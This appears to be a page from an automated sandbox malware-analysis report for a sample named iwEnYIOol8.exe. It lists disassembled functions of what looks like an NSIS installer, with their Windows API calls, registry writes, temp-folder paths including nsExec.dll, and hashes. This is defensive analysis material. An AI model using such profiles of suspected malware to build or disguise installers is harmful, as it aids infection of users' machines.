Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32 ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,00000000,00000011,00000002), ref: 00402602

Strings

C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp
API String ID: 2655323295-22591298
Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58

Function 00405F2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,?,00405F45,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C83,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\iwEnYIOol8.exe"), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C83,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\iwEnYIOol8.exe"), ref: 00405F87
GetFileAttributesW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C83,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405F97

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F2E
C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp, xrefs: 00405F34, 00405F39, 00405F3F, 00405F80, 00405F86, 00405F8E, 00405F96

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp
API String ID: 3248276644-3261251313
Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE

Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,?,00405F45,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C83,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\iwEnYIOol8.exe"), ref: 00405EDF
CharNextW.USER32(00000000), ref: 00405EE4
CharNextW.USER32(00000000), ref: 00405EFC

Strings

C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp, xrefs: 00405ED2

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp
API String ID: 3213498283-22591298
Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA

Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040351F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040351F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405E26

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll), ref: 0040269A

Strings

C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp, xrefs: 00402688
C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll, xrefs: 0040265E, 00402683, 00402695, 004026E1

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp$C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll
API String ID: 1659193697-820681625
Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Function 00406425 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406696,80000002), ref: 0040646B
RegCloseKey.ADVAPI32(?), ref: 00406476

Strings

: Completed, xrefs: 0040642C

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
Opcode Fuzzy Hash: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4

Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
GlobalFree.KERNEL32(00000000), ref: 00403BB5

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403B94

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC

Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\iwEnYIOol8.exe,C:\Users\user\Desktop\iwEnYIOol8.exe,80000000,00000003), ref: 00405E78
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\iwEnYIOol8.exe,C:\Users\user\Desktop\iwEnYIOol8.exe,80000000,00000003), ref: 00405E88

Strings

C:\Users\user\Desktop, xrefs: 00405E72

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
